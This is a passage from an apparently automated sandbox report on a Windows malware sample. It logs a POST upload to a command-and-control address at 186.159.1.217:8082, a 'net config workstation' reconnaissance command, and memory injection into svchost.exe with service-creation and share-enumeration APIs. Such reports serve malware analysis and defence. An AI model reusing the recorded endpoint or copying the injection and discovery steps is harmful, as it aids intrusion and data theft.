Module	Get Address	module_name = c:\windows\system32\kernel32.dll, function = InitializeCriticalSection, address_out = 0x7738a149	1	Fn
Module	Get Address	module_name = c:\windows\system32\kernel32.dll, function = WaitForSingleObject, address_out = 0x76b5ba90	1	Fn
Module	Get Address	module_name = c:\windows\system32\kernel32.dll, function = FreeLibraryAndExitThread, address_out = 0x76b4fdb8	1	Fn
Module	Get Address	module_name = c:\windows\system32\kernel32.dll, function = TerminateThread, address_out = 0x76b622a7	1	Fn
Module	Load	module_name = USER32.dll, base_address = 0x76c00000	1	Fn
Module	Get Address	module_name = c:\windows\system32\user32.dll, function = wsprintfW, address_out = 0x76c2426d	1	Fn
Module	Load	module_name = ole32.dll, base_address = 0x76cd0000	1	Fn
Module	Get Address	module_name = c:\windows\system32\ole32.dll, function = CoInitializeEx, address_out = 0x76d109ad	1	Fn
Module	Get Address	module_name = c:\windows\system32\ole32.dll, function = IIDFromString, address_out = 0x76ce2ff2	1	Fn
Module	Get Address	module_name = c:\windows\system32\ole32.dll, function = CoUninitialize, address_out = 0x76d186d3	1	Fn
Module	Load	module_name = OLEAUT32.dll, base_address = 0x76a60000	1	Fn
Module	Get Address	module_name = c:\windows\system32\oleaut32.dll, function = 9, address_out = 0x76a63eae	1	Fn
Module	Get Handle	module_name = c:\windows\system32\msvcrt.dll, base_address = 0x76f80000	1	Fn
Module	Get Address	module_name = c:\windows\system32\msvcrt.dll, function = _wtoi, address_out = 0x76f8c823	1	Fn
Module	Get Address	module_name = c:\windows\system32\msvcrt.dll, function = _snwprintf_s, address_out = 0x76f9141b	1	Fn
Module	Get Address	module_name = c:\windows\system32\msvcrt.dll, function = _vsnwprintf_s, address_out = 0x76f913b4	1	Fn

Thread 0xb58

Category	Operation	Information	Count	Logfile
Inet	Open Session	user_agent = test, access_type = INTERNET_OPEN_TYPE_PRECONFIG	1	Fn
Inet	Open Connection	protocol = HTTP, server_name = 186.159.1.217, server_port = 8082	1	Fn
Inet	Open HTTP Request	http_verb = POST, http_version = HTTP 1.1, target_resource = /tot478/ZGW5TDPU_W617601.1E8523426B2B0B3522CF81970B864611/90, accept_types = 0	1	Fn
Inet	Send HTTP Request	headers = Content-Type: multipart/form-data; boundary=Arasfjasu7, url = 186.159.1.217/tot478/ZGW5TDPU_W617601.1E8523426B2B0B3522CF81970B864611/90	1	Fn Data
Inet	Read Response	size = 127, size_out = 26	1	Fn Data
Inet	Read Response	size = 127, size_out = 0	1	Fn
Inet	Close Session	-	1	Fn
Inet	Close Session	-	1	Fn
Inet	Close Session	-	1	Fn

Process #47: cmd.exe

Information	Value
ID	#47
File Name	c:\windows\system32\cmd.exe
Command Line	/c net config workstation
Initial Working Directory	C:\Users\2XC7u663GxWc\AppData\Roaming\chromedata\
Monitor	Start Time: 00:03:48, Reason: Child Process
Unmonitor	End Time: 00:03:50, Reason: Self Terminated
Monitor Duration	00:00:01

OS Process Information

Information	Value
PID	0xa50
Parent PID	0xa70 (c:\windows\system32\svchost.exe)
Bitness	32-bit
Is Created or Modified Executable
Integrity Level	Medium
Username	ZGW5TDPU\2XC7u663GxWc
Enabled Privileges	SeChangeNotifyPrivilege
Thread IDs	0x 318

Threads

Thread 0x318

Category	Operation	Information	Count	Logfile
System	Get Time	type = System Time, time = 2019-05-14 15:33:54 (UTC)	1	Fn
System	Get Time	type = Ticks, time = 11072982	1	Fn
System	Get Time	type = Performance Ctr, time = 30244665706	1	Fn
Module	Get Handle	module_name = c:\windows\system32\cmd.exe, base_address = 0x4a3c0000	1	Fn
Module	Get Handle	module_name = c:\windows\system32\kernel32.dll, base_address = 0x76b10000	1	Fn
Module	Get Address	module_name = c:\windows\system32\kernel32.dll, function = SetThreadUILanguage, address_out = 0x76b624c2	1	Fn
Registry	Open Key	reg_name = HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\System	1	Fn
File	Open	filename = STD_OUTPUT_HANDLE	2	Fn
File	Open	filename = STD_INPUT_HANDLE	1	Fn
Environment	Get Environment String	-	2	Fn Data
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor, value_name = DisableUNCCheck, data = 232, type = REG_NONE	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor, value_name = EnableExtensions, data = 1, type = REG_DWORD_LITTLE_ENDIAN	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor, value_name = DelayedExpansion, data = 1, type = REG_NONE	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor, value_name = DefaultColor, data = 0, type = REG_DWORD_LITTLE_ENDIAN	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor, value_name = CompletionChar, data = 64, type = REG_DWORD_LITTLE_ENDIAN	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor, value_name = PathCompletionChar, data = 64, type = REG_DWORD_LITTLE_ENDIAN	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor, value_name = AutoRun, data = 64, type = REG_NONE	1	Fn
Registry	Open Key	reg_name = HKEY_CURRENT_USER\Software\Microsoft\Command Processor	1	Fn
Registry	Read Value	reg_name = HKEY_CURRENT_USER\Software\Microsoft\Command Processor, value_name = DisableUNCCheck, data = 64, type = REG_NONE	1	Fn
Registry	Read Value	reg_name = HKEY_CURRENT_USER\Software\Microsoft\Command Processor, value_name = EnableExtensions, data = 1, type = REG_DWORD_LITTLE_ENDIAN	1	Fn
Registry	Read Value	reg_name = HKEY_CURRENT_USER\Software\Microsoft\Command Processor, value_name = DelayedExpansion, data = 1, type = REG_NONE	1	Fn
Registry	Read Value	reg_name = HKEY_CURRENT_USER\Software\Microsoft\Command Processor, value_name = DefaultColor, data = 0, type = REG_DWORD_LITTLE_ENDIAN	1	Fn
Registry	Read Value	reg_name = HKEY_CURRENT_USER\Software\Microsoft\Command Processor, value_name = CompletionChar, data = 9, type = REG_DWORD_LITTLE_ENDIAN	1	Fn
Registry	Read Value	reg_name = HKEY_CURRENT_USER\Software\Microsoft\Command Processor, value_name = PathCompletionChar, data = 9, type = REG_DWORD_LITTLE_ENDIAN	1	Fn
Registry	Read Value	reg_name = HKEY_CURRENT_USER\Software\Microsoft\Command Processor, value_name = AutoRun, data = 9, type = REG_NONE	1	Fn
Module	Get Filename	process_name = c:\windows\system32\cmd.exe, file_name_orig = C:\Windows\system32\cmd.exe, size = 260	1	Fn
Environment	Get Environment String	name = PATH, result_out = C:\ProgramData\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\	1	Fn
Environment	Get Environment String	name = PATHEXT, result_out = .COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC	1	Fn
Environment	Get Environment String	name = PROMPT	1	Fn
Environment	Set Environment String	name = PROMPT, value = $P$G	1	Fn
Environment	Get Environment String	-	1	Fn Data
Environment	Get Environment String	name = COMSPEC, result_out = C:\Windows\system32\cmd.exe	1	Fn
Environment	Get Environment String	name = KEYS	1	Fn
File	Get Info	filename = C:\Users\2XC7u663GxWc\AppData\Roaming\chromedata, type = file_attributes	2	Fn
Environment	Set Environment String	name = =C:, value = C:\Users\2XC7u663GxWc\AppData\Roaming\chromedata	1	Fn
Environment	Get Environment String	-	1	Fn Data
Module	Get Handle	module_name = c:\windows\system32\kernel32.dll, base_address = 0x76b10000	1	Fn
Module	Get Address	module_name = c:\windows\system32\kernel32.dll, function = CopyFileExW, address_out = 0x76b4ac6c	1	Fn
Module	Get Address	module_name = c:\windows\system32\kernel32.dll, function = IsDebuggerPresent, address_out = 0x76b53ea8	1	Fn
Module	Get Address	module_name = c:\windows\system32\kernel32.dll, function = SetConsoleInputExeNameW, address_out = 0x76b62732	1	Fn
Environment	Get Environment String	name = PATH, result_out = C:\ProgramData\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\	1	Fn
Environment	Get Environment String	name = PATHEXT, result_out = .COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC	1	Fn
Process	Create	process_name = C:\Windows\system32\net.exe, os_pid = 0xd4c, creation_flags = CREATE_EXTENDED_STARTUPINFO_PRESENT, show_window = SW_SHOWNORMAL	1	Fn
Environment	Set Environment String	name = COPYCMD	1	Fn
Environment	Get Environment String	-	1	Fn Data
Environment	Set Environment String	name = =ExitCode, value = 00000000	1	Fn
Environment	Get Environment String	-	1	Fn Data
Environment	Set Environment String	name = =ExitCodeAscii	1	Fn
Environment	Get Environment String	-	1	Fn Data
File	Open	filename = STD_OUTPUT_HANDLE	2	Fn
File	Open	filename = STD_INPUT_HANDLE	1	Fn

Process #48: net.exe

Information	Value
ID	#48
File Name	c:\windows\system32\net.exe
Command Line	net config workstation
Initial Working Directory	C:\Users\2XC7u663GxWc\AppData\Roaming\chromedata\
Monitor	Start Time: 00:03:48, Reason: Child Process
Unmonitor	End Time: 00:03:50, Reason: Self Terminated
Monitor Duration	00:00:01
Remark	No high level activity detected in monitored regions

OS Process Information

Information	Value
PID	0xd4c
Parent PID	0xa50 (c:\windows\system32\cmd.exe)
Bitness	32-bit
Is Created or Modified Executable
Integrity Level	Medium
Username	ZGW5TDPU\2XC7u663GxWc
Enabled Privileges	SeChangeNotifyPrivilege
Thread IDs	0x 918

Process #49: net1.exe

Information	Value
ID	#49
File Name	c:\windows\system32\net1.exe
Command Line	C:\Windows\system32\net1 config workstation
Initial Working Directory	C:\Users\2XC7u663GxWc\AppData\Roaming\chromedata\
Monitor	Start Time: 00:03:48, Reason: Child Process
Unmonitor	End Time: 00:03:50, Reason: Self Terminated
Monitor Duration	00:00:01

OS Process Information

Information	Value
PID	0x3dc
Parent PID	0xd4c (c:\windows\system32\net.exe)
Bitness	32-bit
Is Created or Modified Executable
Integrity Level	Medium
Username	ZGW5TDPU\2XC7u663GxWc
Enabled Privileges	SeChangeNotifyPrivilege
Thread IDs	0x 87C 0x 3F8 0x D5C

Threads

Thread 0x87c

Category	Operation	Information	Count	Logfile
System	Get Time	type = System Time, time = 2019-05-14 15:33:54 (UTC)	1	Fn
System	Get Time	type = Ticks, time = 11073247	1	Fn
System	Get Time	type = Performance Ctr, time = 30302875396	1	Fn
Module	Get Handle	module_name = c:\windows\system32\net1.exe, base_address = 0x440000	1	Fn
File	Open	filename = STD_OUTPUT_HANDLE	1	Fn
File	Open	filename = STD_ERROR_HANDLE	1	Fn
Module	Get Filename	process_name = c:\windows\system32\net1.exe, file_name_orig = C:\Windows\system32\net1.exe, size = 260	1	Fn
Service	Open Manager	database_name = SERVICES_ACTIVE_DATABASE	1	Fn
Service	Get Service Name	database_name = SERVICES_ACTIVE_DATABASE	1	Fn
User	Get Username	user_name_out = 2XC7u663GxWc	2	Fn
System	Get Computer Name	result_out = ZgW5tdPu, type = ComputerNameDnsFullyQualified	1	Fn
Module	Load	module_name = NETMSG, base_address = 0x72190000	1	Fn
File	Get Info	filename = STD_ERROR_HANDLE, type = file_type	1	Fn
File	Write	filename = STD_ERROR_HANDLE, size = 49	1	Fn Data
File	Get Info	filename = STD_ERROR_HANDLE, type = file_type	1	Fn
File	Write	filename = STD_ERROR_HANDLE, size = 47	1	Fn Data
File	Get Info	filename = STD_ERROR_HANDLE, type = file_type	1	Fn
File	Write	filename = STD_ERROR_HANDLE, size = 51	1	Fn Data
File	Get Info	filename = STD_ERROR_HANDLE, type = file_type	1	Fn
File	Write	filename = STD_ERROR_HANDLE, size = 2	1	Fn Data
File	Get Info	filename = STD_ERROR_HANDLE, type = file_type	1	Fn
File	Write	filename = STD_ERROR_HANDLE, size = 39	1	Fn Data
File	Get Info	filename = STD_ERROR_HANDLE, type = file_type	1	Fn
File	Write	filename = STD_ERROR_HANDLE, size = 68	1	Fn Data
File	Get Info	filename = STD_ERROR_HANDLE, type = file_type	1	Fn
File	Write	filename = STD_ERROR_HANDLE, size = 2	1	Fn Data
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion, value_name = ProductName, data = 0, type = REG_SZ	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion, value_name = ProductName, data = Windows 7 Professional, type = REG_SZ	1	Fn
File	Get Info	filename = STD_ERROR_HANDLE, type = file_type	1	Fn
File	Write	filename = STD_ERROR_HANDLE, size = 61	1	Fn Data
File	Get Info	filename = STD_ERROR_HANDLE, type = file_type	1	Fn
File	Write	filename = STD_ERROR_HANDLE, size = 2	1	Fn Data
File	Get Info	filename = STD_ERROR_HANDLE, type = file_type	1	Fn
File	Write	filename = STD_ERROR_HANDLE, size = 48	1	Fn Data
File	Get Info	filename = STD_ERROR_HANDLE, type = file_type	1	Fn
File	Write	filename = STD_ERROR_HANDLE, size = 47	1	Fn Data
File	Get Info	filename = STD_ERROR_HANDLE, type = file_type	1	Fn
File	Write	filename = STD_ERROR_HANDLE, size = 2	1	Fn Data
File	Get Info	filename = STD_ERROR_HANDLE, type = file_type	1	Fn
File	Write	filename = STD_ERROR_HANDLE, size = 40	1	Fn Data
File	Get Info	filename = STD_ERROR_HANDLE, type = file_type	1	Fn
File	Write	filename = STD_ERROR_HANDLE, size = 41	1	Fn Data
File	Get Info	filename = STD_ERROR_HANDLE, type = file_type	1	Fn
File	Write	filename = STD_ERROR_HANDLE, size = 42	1	Fn Data
File	Get Info	filename = STD_ERROR_HANDLE, type = file_type	1	Fn
File	Write	filename = STD_ERROR_HANDLE, size = 37	1	Fn Data
File	Get Info	filename = STD_ERROR_HANDLE, type = file_type	1	Fn
File	Write	filename = STD_ERROR_HANDLE, size = 2	1	Fn Data

Process #50: svchost.exe

247

Information	Value
ID	#50
File Name	c:\windows\system32\svchost.exe
Command Line	svchost.exe
Initial Working Directory	C:\Users\2XC7u663GxWc\AppData\Roaming\chromedata\
Monitor	Start Time: 00:03:50, Reason: Child Process
Unmonitor	End Time: 00:04:16, Reason: Terminated by Timeout
Monitor Duration	00:00:26

OS Process Information

Information	Value
PID	0xda0
Parent PID	0x214 (c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe)
Bitness	32-bit
Is Created or Modified Executable
Integrity Level	Medium
Username	ZGW5TDPU\2XC7u663GxWc
Enabled Privileges	SeChangeNotifyPrivilege
Thread IDs	0x D90 0x DCC 0x DDC 0x DC8 0x DBC

Injection Information

Injection Type	Source Process	Source Os Thread ID	Information	Count	Logfile
Modify Memory	#24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe	0x264	address = 0x50000, size = 367	1	Fn Data
Modify Memory	#24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe	0x264	address = 0xa0000, size = 112	47	Fn Data
Modify Memory	#24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe	0x264	address = 0x602104, size = 12	1	Fn Data
Modify Memory	#24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe	0x264	address = 0x6cd40000, size = 1024	1	Fn Data
Modify Memory	#24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe	0x264	address = 0x6cd41000, size = 5632	2	Fn Data
Modify Memory	#24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe	0x264	address = 0x6cd43000, size = 512	2	Fn Data
Modify Memory	#24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe	0x264	address = 0x6cd44000, size = 512	2	Fn Data
Modify Memory	#24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe	0x264	address = 0x6cd45000, size = 36	1	Fn Data
Modify Memory	#24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe	0x264	address = 0x6cd46000, size = 512	2	Fn Data
Modify Memory	#24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe	0x264	address = 0x6cd47000, size = 1536	2	Fn Data
Modify Memory	#24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe	0x264	address = 0x6cd48000, size = 512	2	Fn Data
Modify Memory	#24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe	0x264	address = 0x20000, size = 26	3	Fn Data
Modify Memory	#24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe	0x264	address = 0xb0000, size = 12	6	Fn Data
Modify Memory	#24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe	0x264	address = 0x20000, size = 19	4	Fn Data
Modify Memory	#24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe	0x264	address = 0xb0000, size = 16	37	Fn Data
Modify Memory	#24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe	0x264	address = 0x6cd47138, size = 4	1	Fn Data
Modify Memory	#24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe	0x264	address = 0x20000, size = 15	3	Fn Data
Modify Memory	#24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe	0x264	address = 0x6cd4713c, size = 4	1	Fn Data
Modify Memory	#24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe	0x264	address = 0x6cd47140, size = 4	1	Fn Data
Modify Memory	#24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe	0x264	address = 0x20000, size = 14	3	Fn Data
Modify Memory	#24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe	0x264	address = 0x6cd47144, size = 4	1	Fn Data
Modify Memory	#24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe	0x264	address = 0x20000, size = 12	6	Fn Data
Modify Memory	#24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe	0x264	address = 0x6cd4714c, size = 4	1	Fn Data
Modify Memory	#24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe	0x264	address = 0x20000, size = 10	5	Fn Data
Modify Memory	#24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe	0x264	address = 0x6cd47150, size = 4	1	Fn Data
Modify Memory	#24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe	0x264	address = 0x6cd47154, size = 4	1	Fn Data
Modify Memory	#24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe	0x264	address = 0x20000, size = 13	2	Fn Data
Modify Memory	#24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe	0x264	address = 0x6cd47158, size = 4	1	Fn Data
Modify Memory	#24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe	0x264	address = 0x6cd4715c, size = 4	1	Fn Data
Modify Memory	#24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe	0x264	address = 0x20000, size = 17	2	Fn Data
Modify Memory	#24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe	0x264	address = 0x6cd47160, size = 4	1	Fn Data
Modify Memory	#24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe	0x264	address = 0x6cd47164, size = 4	1	Fn Data
Modify Memory	#24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe	0x264	address = 0x6cd47168, size = 4	1	Fn Data
Modify Memory	#24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe	0x264	address = 0x6cd4716c, size = 4	1	Fn Data
Modify Memory	#24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe	0x264	address = 0x20000, size = 11	2	Fn Data
Modify Memory	#24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe	0x264	address = 0x6cd47170, size = 4	1	Fn Data
Modify Memory	#24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe	0x264	address = 0x20000, size = 9	3	Fn Data
Modify Memory	#24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe	0x264	address = 0x6cd47174, size = 4	1	Fn Data
Modify Memory	#24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe	0x264	address = 0x6cd47178, size = 4	1	Fn Data
Modify Memory	#24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe	0x264	address = 0x20000, size = 6	1	Fn Data
Modify Memory	#24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe	0x264	address = 0x6cd4717c, size = 4	1	Fn Data
Modify Memory	#24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe	0x264	address = 0x20000, size = 20	4	Fn Data
Modify Memory	#24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe	0x264	address = 0x6cd47180, size = 4	1	Fn Data
Modify Memory	#24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe	0x264	address = 0x6cd47184, size = 4	1	Fn Data
Modify Memory	#24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe	0x264	address = 0x6cd47188, size = 4	1	Fn Data
Modify Memory	#24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe	0x264	address = 0x6cd4718c, size = 4	1	Fn Data
Modify Memory	#24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe	0x264	address = 0x20000, size = 16	2	Fn Data
Modify Memory	#24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe	0x264	address = 0x6cd47194, size = 4	1	Fn Data
Modify Memory	#24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe	0x264	address = 0x20000, size = 23	2	Fn Data
Modify Memory	#24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe	0x264	address = 0x6cd47198, size = 4	1	Fn Data
Modify Memory	#24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe	0x264	address = 0x6cd4719c, size = 4	1	Fn Data
Modify Memory	#24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe	0x264	address = 0x20000, size = 18	1	Fn Data
Modify Memory	#24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe	0x264	address = 0x6cd471a0, size = 4	1	Fn Data
Modify Memory	#24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe	0x264	address = 0x6cd471a4, size = 4	1	Fn Data
Modify Memory	#24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe	0x264	address = 0x6cd471ac, size = 4	1	Fn Data
Modify Memory	#24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe	0x264	address = 0x20000, size = 22	1	Fn Data
Modify Memory	#24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe	0x264	address = 0x6cd471b4, size = 4	1	Fn Data
Modify Memory	#24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe	0x264	address = 0x6cd471b8, size = 4	1	Fn Data
Modify Memory	#24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe	0x264	address = 0x20000, size = 24	1	Fn Data
Modify Memory	#24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe	0x264	address = 0x6cd471c0, size = 4	1	Fn Data
Modify Memory	#24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe	0x264	address = 0x6cd471c4, size = 4	1	Fn Data
Modify Memory	#24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe	0x264	address = 0x6cd471c8, size = 4	1	Fn Data
Modify Memory	#24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe	0x264	address = 0x6cd471cc, size = 4	1	Fn Data
Modify Memory	#24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe	0x264	address = 0x6cd471d0, size = 4	1	Fn Data
Modify Memory	#24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe	0x264	address = 0x6cd471d4, size = 4	1	Fn Data
Modify Memory	#24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe	0x264	address = 0x6cd471d8, size = 4	1	Fn Data
Modify Memory	#24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe	0x264	address = 0x6cd471dc, size = 4	1	Fn Data
Modify Memory	#24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe	0x264	address = 0xb0000, size = 4	2	Fn Data
Modify Memory	#24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe	0x264	address = 0x340000, size = 1024	2	Fn Data
Modify Memory	#24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe	0x264	address = 0x350000, size = 388	1	Fn Data
Modify Memory	#24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe	0x264	address = 0x360000, size = 40	1	Fn Data
Modify Memory	#24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe	0x264	address = 0x20000, size = 8	1	Fn Data
Modify Memory	#24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe	0x264	address = 0x350000, size = 128	1	Fn Data
Modify Memory	#24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe	0x264	address = 0x370000, size = 44	1	Fn Data

Threads

Thread 0xd90

Category	Operation	Information	Count	Logfile
Module	Load	module_name = ADVAPI32.dll, base_address = 0x774c0000	1	Fn
Module	Get Address	module_name = c:\windows\system32\advapi32.dll, function = CloseServiceHandle, address_out = 0x774d369c	1	Fn
Module	Get Address	module_name = c:\windows\system32\advapi32.dll, function = CreateServiceW, address_out = 0x774e712c	1	Fn
Module	Get Address	module_name = c:\windows\system32\advapi32.dll, function = OpenSCManagerW, address_out = 0x774cca64	1	Fn
Module	Get Address	module_name = c:\windows\system32\advapi32.dll, function = StartServiceW, address_out = 0x774c7974	1	Fn
Module	Load	module_name = KERNEL32.dll, base_address = 0x76b10000	1	Fn
Module	Get Address	module_name = c:\windows\system32\kernel32.dll, function = CloseHandle, address_out = 0x76b5ca7c	1	Fn
Module	Get Address	module_name = c:\windows\system32\kernel32.dll, function = CopyFileW, address_out = 0x76b467c3	1	Fn
Module	Get Address	module_name = c:\windows\system32\kernel32.dll, function = CreateFileW, address_out = 0x76b5cc56	1	Fn
Module	Get Address	module_name = c:\windows\system32\kernel32.dll, function = CreateThread, address_out = 0x76b6375d	1	Fn
Module	Get Address	module_name = c:\windows\system32\kernel32.dll, function = DeleteFileW, address_out = 0x76b50f62	1	Fn
Module	Get Address	module_name = c:\windows\system32\kernel32.dll, function = GetComputerNameW, address_out = 0x76b503ff	1	Fn
Module	Get Address	module_name = c:\windows\system32\kernel32.dll, function = GetLastError, address_out = 0x76b5bf00	1	Fn
Module	Get Address	module_name = c:\windows\system32\kernel32.dll, function = GetModuleHandleA, address_out = 0x76b5cf41	1	Fn
Module	Get Address	module_name = c:\windows\system32\kernel32.dll, function = HeapAlloc, address_out = 0x77382dd6	1	Fn
Module	Get Address	module_name = c:\windows\system32\kernel32.dll, function = HeapCreate, address_out = 0x76b63ea2	1	Fn
Module	Get Address	module_name = c:\windows\system32\kernel32.dll, function = HeapFree, address_out = 0x76b5bbd0	1	Fn
Module	Get Address	module_name = c:\windows\system32\kernel32.dll, function = HeapReAlloc, address_out = 0x7739ff51	1	Fn
Module	Get Address	module_name = c:\windows\system32\kernel32.dll, function = Sleep, address_out = 0x76b5ba46	1	Fn
Module	Get Address	module_name = c:\windows\system32\kernel32.dll, function = WideCharToMultiByte, address_out = 0x76b6450e	1	Fn
Module	Get Address	module_name = c:\windows\system32\kernel32.dll, function = WriteFile, address_out = 0x76b61400	1	Fn
Module	Get Address	module_name = c:\windows\system32\kernel32.dll, function = lstrcmpW, address_out = 0x76b667b0	1	Fn
Module	Get Address	module_name = c:\windows\system32\kernel32.dll, function = lstrlenW, address_out = 0x76b5d9e8	1	Fn
Module	Load	module_name = MPR.DLL, base_address = 0x71e30000	1	Fn
Module	Get Address	module_name = c:\windows\system32\mpr.dll, function = WNetAddConnection2W, address_out = 0x71e34744	1	Fn
Module	Get Address	module_name = c:\windows\system32\mpr.dll, function = WNetCancelConnection2W, address_out = 0x71e38cd1	1	Fn
Module	Get Address	module_name = c:\windows\system32\mpr.dll, function = WNetCloseEnum, address_out = 0x71e32dd6	1	Fn
Module	Get Address	module_name = c:\windows\system32\mpr.dll, function = WNetEnumResourceW, address_out = 0x71e33058	1	Fn
Module	Get Address	module_name = c:\windows\system32\mpr.dll, function = WNetOpenEnumW, address_out = 0x71e32f06	1	Fn
Module	Load	module_name = ntdll.dll, base_address = 0x77330000	1	Fn
Module	Get Address	module_name = c:\windows\system32\ntdll.dll, function = _vsnwprintf, address_out = 0x7739caaa	1	Fn
Module	Load	module_name = USER32.dll, base_address = 0x76c00000	1	Fn
Module	Get Address	module_name = c:\windows\system32\user32.dll, function = wsprintfA, address_out = 0x76c13f47	1	Fn
